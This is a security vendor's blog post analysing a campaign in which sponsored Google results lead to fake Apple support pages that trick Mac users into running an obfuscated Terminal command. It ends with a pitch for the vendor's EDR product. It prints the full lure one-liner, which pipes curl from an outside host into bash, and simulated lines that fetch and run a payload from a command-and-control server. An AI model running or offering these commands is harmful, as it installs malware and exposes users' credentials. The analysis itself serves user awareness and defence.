Fake ‘Mac Cleaner’ Google Ads Spread macOS Malware

Hackers exploit Google Search ads for fake Mac “cleaner” tools. Learn how they redirect users to malicious Apple-style pages and deliver malware on macOS.

Govern Unknown Execution on macOS
  • May 14, 2026

Malicious Ads Lure Mac Users

When Mac owners search for terms like “Mac cleaner” or “clear cache macOS,” dangerous sponsored links may appear above legitimate results. These ads leverage Google’s advertising system and even use verified advertiser identities to appear trustworthy.

Sponsored results pointing to domains like docs.google.com and business.google.com that advertise Mac optimization tools. One such example is a Google search screenshot with listings titled “Mac System Optimization” and “How to Clear Storage on Mac” linking to Google Docs and Business pages. These results seem harmless but actually lead to malicious sites.

Apple-Style Support Pages Host Malicious Instructions

The fake support page shown above demonstrates the deception. It carries Apple branding and a title like “Free up storage space on Mac,” but it is actually hosted on a Google Apps Script or a Medium site. The page layout looks like official Apple documentation, complete with navigation menus and step-by-step instructions.

For example, one such page tells the user to open Terminal and run a given command. The visible Terminal text might start with echo "Cleaning macOS Storage...", followed by a long Base64-encoded string of gibberish. This hidden Base64 string, when decoded with the base64 -D command, becomes the real shell command that downloads and executes malicious code.

ClickFix Simulation: MacOS Cleanup Lure Analysis
SEARCH HIJACKING ANALYSIS
MALICIOUS ADS:
THE SEARCH-TO-SHELL CHAIN

See how attackers use Google Sponsored Ads and fake Apple Support pages to trick users into running obfuscated malware scripts.

ANALYZE ATTACK VECTOR
google.com/search?q=mac+cleaner+optimization
Google
mac cleaner optimization
Sponsored • docs.google.com
How to Clear Storage on Mac – Mac System Optimization
Reclaim space and speed up your macOS device instantly. Official Google Docs guide for system maintenance…
Sponsored • business.google.com
Mac Cleanup Tool – Free Up System Caches
Follow our verified business page instructions to safely remove ‘Other’ storage from your MacBook…
STEP 0: THE AD POISONING

Attackers use Google Ads to place malicious links at the top of search results. By hosting content on docs.google.com, they exploit the user’s inherent trust in Google’s domain.

support-macos-guide.medium.com/storage-fix
StoreMaciPadiPhoneSupport

Free up storage space on Mac

Follow these steps to safely optimize your system caches using the macOS Terminal utility.

Step 3: Automated Cleanup Script

Copy and paste the following line into your Terminal application to begin the optimization process:

echo “Q2xlYW5pbmcgbWFjT1MgU3RvcmFnZS4uLi4K” | base64 -D; echo “W29rXQpEb3dubG9hZGluZyBwYWNrYWdlcy4uLgo=” | base64 -D; curl -sL https://cdn.sys-mac.io/update.sh | bash
STEP 1: THE DECEPTIVE PAGE

The page mimics Apple’s design perfectly. It instructs the user to run a Terminal command that looks like a routine maintenance task but contains Base64-encoded malicious logic.

Security Analyst View — Obfuscation Breakdown

Command Deconstruction

THE BAIT (VISUAL FEEDBACK)
echo "Q2xlY..." | base64 -D

Decodes to: “Cleaning macOS Storage…” (Reassures the user)

THE HOOK (MALICIOUS PAYLOAD)
curl -sL https://... | bash

Downloads and executes a third-stage shell script with full user permissions. No Gatekeeper trigger.

STEP 2: TRIGGERING THE CHAIN

By using base64 -D, attackers hide the script’s true intent from simple visual inspection. The command runs with the user’s active permissions.

Terminal — bash — 80×24
user@MacBook-Pro ~ % [Command Executed]
Cleaning macOS Storage….
[ok]
Downloading packages…
# Background Activity (Invisible to User):
>> fetch https://api.c2-server.net/payload/macos_v3.bin
>> chmod +x /tmp/com.apple.syslog.update
>> /tmp/com.apple.syslog.update –stealth &
STEP 3: EXECUTION PHASE

The terminal shows “reassuring” progress messages while the actual curl command downloads and launches the malware in the background.

Security Compromise Summary

POST-EXECUTION IMPACT

Remote Backdoor

Attackers gain a persistent shell, allowing them to control the Mac remotely at any time.

Credential Theft

Access to SSH keys, browser profiles, and local password databases (Keychains).

Illicit Mining

Using the Mac’s CPU/GPU resources to mine cryptocurrency without user consent.

Detection Status: Bypasses Gatekeeper via direct user-initiated Terminal execution.

STRATEGIC DEFENSE
Break the Kill Chain

Technical controls are bypassed by social engineering. Culture is your last line of defense.

Obfuscated Commands Trigger Malware

Firstly, it should be noted what is done after the user executes the pasted command. At face value, it seems to be normal maintenance procedures. But in fact, it instantly initiates hidden commands. Thus, what does this attack do?

  • It begins with echoing benign messages such as “Cleaning macOS Storage…” and “Installing packages…”. This action is aimed at reassuring the user about what is going on.
  • Then it decodes a Base64 string (using base64 -D for macOS) to get the actual shell command.
  • Then the executed command downloads some malware from the internet using curl command and pipes the received data into bash shell. Everything that the attack is doing is using the user’s permissions, which is why macOS does not recognize it as malicious behavior.

Overall, the whole attack sequence allows hackers to gain full control of the computer remotely. Specifically, after running the attack, hackers could:

  • Deploy backdoors or other malware on the machine.
  • Steal personal documents and sensitive information (for example, SSH keys).
  • Exploit the computer’s power for criminal purposes (cryptomining).

Hijacked Advertiser Accounts Fuel the Scam

These malicious ads were served through legitimate Google Ads accounts that had been hijacked. Verified advertiser identities like “Nathaniel Josue Rodriguez” and “Aloha Shirt Shop” appeared on the ads, even though these accounts had previously run normal campaigns. Google’s transparency tools showed these accounts had existing ad histories, suggesting attackers took them over.

By exploiting trusted accounts, the attackers bypassed Google’s standard checks and slipped their malicious ads into search results. Once discovered, the ads were reported to Google and removed.

A Broader Trend of Ad-Based Mac Malware

This Mac cleaner campaign is part of a larger pattern of ad-based attacks targeting macOS. For example, it was reported another scheme where hackers hijacked over 35 Google Ads accounts to push malware via fake Mac app downloads. Those ads targeted searches for popular software (e.g. 7-Zip, Notepad++, Final Cut Pro) but instead delivered an infostealer payload to infected Macs. Both attacks rely on placing malicious sponsored ads high in search results and then guiding users to deceptive sites that look legitimate. Because the ads display verified links (and often mimic official Apple style), they can fool even cautious Mac users into trusting them. In practice, a user who needs a quick fix might follow the on-screen “support” instructions and unknowingly install the malware on their own Mac.

Conclusion: When Search Results Become the Delivery System

Fake “Mac Cleaner” ads show how attackers are turning trusted search behavior into a malware delivery chain. The victim does not receive a suspicious attachment or visit an obvious fake domain. They search for a utility, click a promoted result, land on a page that looks legitimate, then run a command they believe is routine maintenance.

The attack succeeds because trust is borrowed from the platforms users already rely on.

Why This Threat Works So Well

This campaign abuses the full chain of user confidence:

  • Google Ads place the malicious result where users are most likely to click
  • Google-hosted pages make the link appear safer than a random domain
  • Apple-style design lowers suspicion
  • Base64 hides the real script logic from visual inspection
  • Terminal execution bypasses Gatekeeper because the user initiates the command
  • Reassuring progress messages distract while malware downloads in the background

Once executed, the attacker can gain a remote shell, steal credentials, access SSH keys and browser data, or abuse the Mac for illicit mining.

Where Xcitium Changes the Outcome

For organizations using Xcitium Advanced EDR, this attack would not succeed.

  • Unknown scripts are intercepted at execution
  • Hidden curl downloads cannot quietly launch malware
  • Code can run without being able to cause damage
  • Backdoor creation, credential theft, and persistence attempts are stopped before impact
  • The search-to-shell chain collapses before the Mac becomes attacker-controlled

Even when the user is tricked into running the command, the malware does not get the freedom it needs to harm the system.

Stop Malware at the Moment Trust Is Abused

Malicious ads exploit confidence. Fake pages exploit design. Terminal commands exploit user intent.

Modern defense must assume users can be deceived, then stop the attack at execution.

Protect users from search-driven malware campaigns.
Choose Xcitium Advanced EDR, powered by the patented Zero-Dwell platform.

Like what you see? Share with a friend.

Move Away From Detection With Patented Threat Prevention Built For Today's Challenges.

No one can stop zero-day malware from entering your network, but Xcitium can prevent if from causing any damage. Zero infection. Zero damage.

Book a Demo